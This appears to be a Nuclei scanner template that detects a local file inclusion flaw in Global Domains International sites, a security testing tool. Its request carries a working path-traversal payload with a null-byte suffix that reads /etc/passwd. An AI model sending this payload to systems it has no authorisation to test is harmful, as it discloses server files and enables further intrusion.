id: global-domains-lfi

info:
  name: Global Domains International - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Global Domains International is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2018020247
    - http://www.nic.ws
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: globaldomains,lfi,traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a004730450221008dfb7c07443b32c6b40c4b48d33bea646ed55bc71b02b6ae97ff6964d65fbfef02206029f0a40d688409773c9608df540cb3d32686fb5c4cb0780db874a9d5ff79ce:922c64590222798bb761d5b6d8e72950
